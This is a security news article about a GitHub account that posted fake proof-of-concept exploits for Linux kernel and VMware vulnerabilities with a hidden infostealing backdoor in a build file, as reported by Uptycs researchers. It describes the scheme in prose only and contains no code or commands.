Linux Hacker Exploits Researchers with Fake PoCs Posted to GitHub

A cyber attacker gives defenders a taste of their own medicine, with GitHub honeypots concealing infostealers.

A GitHub user managed to dupe security researchers by publishing fake proofs-of-concept (PoCs) containing Linux backdoors.
Cybersecurity researchers use PoCs to test and better understand publicly known vulnerabilities. They are essential and ubiquitous which, perhaps, makes it easier for a bad one to slip through.
Researchers from Uptycs this week
outed a GitHub user
(now deactivated) who copied legitimate PoCs for known vulnerabilities, reposting them with hidden Linux-built infostealing malware. One of the two fake PoCs had already been forked 25 times at the time of discovery; a second copy has been forked 20 times.
Siddartha Malladi, security researcher at Uptycs, doesnt blame the victims for the egg on their face. On any bad day, I just might not check every detail, he says about this kind of trap. Im not efficient enough to check every line of code every day, right?
During regular testing for various common vulnerabilities, the Uptycs researchers came across a suspicious PoC. On the surface, it appears to be an authentic demonstration, complete with strings that mimic genuine output, they wrote in their blog post, but running the code triggered significant irregularities in their system, including unexpected network connections, unusual data transfers, and unauthorized system access attempts.
It turned out that what theyd downloaded was
a GitHub entry masquerading as a PoC
for
CVE-2023-35829
, a 7.0-rated high severity
use-after-free vulnerability
in the Linux kernel. The contents of the submission were, tellingly, copied almost bit-for-bit from a
legitimate PoC for a different vulnerability
in the Linux kernel,
CVE-2022-34918
. The only difference was an additional file — src/aclocal.m4 — acting as a downloader for a Linux bash script. The script contains a backdoor that collects information about the host machine, such as the hostname and username and a list of home directory contents.
The same profile behind that first malicious PoC also published one more, pertaining to
CVE-2023-20871
, a 7.8 high severity privilege escalation vulnerability in the VMware Fusion hypervisor. In everything but name, this second honeypot was identical to the first.
The mastermind behind all of this is
GitHub user ChriSanders22
. The profile appears to have stolen its bio from
another GitHub user
, and its profile picture depicts the chess grandmaster Shakhriyar Mamedyarov. Malladi was able to connect the profile with
a user on chess.com
from the Philippines.
The profile and its malicious PoCs have since been deleted. A GitHub spokesperson informed Dark Reading, We removed the content in accordance with GitHubs Acceptable Use Policies, which prohibit posting content that directly supports unlawful active attack or malware campaigns that are causing technical harms.
A copied version
of the fake CVE-2023-35829 PoC is still live. It has been forked 20 times.
Neoteric as PoC poisoning may be,
hackers have been known to impersonate researchers before
. They might do it just to prove that they can, or to learn more about their adversaries. Or, Malladi posits, they might want to steal researchers powerful software tools.
Meanwhile, theres not much that repositories can do to prevent this particular brand of phishing, even when a fake PoC obviously overlaps with a legitimate one. Malladi posits a hypothetical college course, where beginner students are assigned to code a hello, world program in Python, then publish it to GitHub. The same code could be published by dozens of new accounts, but what can they do? It is a legit thing. Thats the problem — even if copying can be detected, the admins cannot do anything about it.
And so, cybersecurity professionals are going to have to walk the walk — engaging with cyberspace with the same caution and preparedness they expect of their clients, by always testing in a virtual environment.
Weve definitely seen
these types of attacks before
, Malladi emphasizes. I want people to understand that this is not stopping in the future.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
Linux Hacker Exploits Researchers with Fake PoCs Posted to GitHub